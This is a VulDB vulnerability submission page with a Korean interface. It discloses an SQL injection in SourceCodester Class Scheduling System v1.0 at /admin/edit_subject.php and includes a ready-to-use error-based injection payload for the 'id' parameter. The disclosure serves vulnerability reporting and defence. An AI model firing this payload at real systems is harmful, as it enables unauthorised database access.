| 제목 | Class Scheduling System v1.0 /online_class_scheduling_system/admin/edit_subject.php GET parameters has SQL injection |
|---|
| 설명 | Class Scheduling System v1.0 has SQL injection.
Vulnerability File: /online_class_scheduling_system/admin/edit_subject.php
Vulnerability location: /online_class_scheduling_system/admin/edit_subject.php?id
Payload: id=23' and (select 1 from(select count(*),concat(0x71727374,(select (elt(333=333,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)x) and 'b'='b
Error-based SQL injection is successful, proving the existence of SQL injection vulnerabilities.
|
|---|
| 원천 | ⚠️ https://github.com/zhulielie/CVEReport/blob/main/SQL.md |
|---|
| 사용자 | zhulielie (UID 46781) |
|---|
| 제출 | 2023. 05. 20. AM 03:41 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 05. 20. AM 08:49 (5 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 229597 [SourceCodester Class Scheduling System 1.0 GET Parameter /admin/edit_subject.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|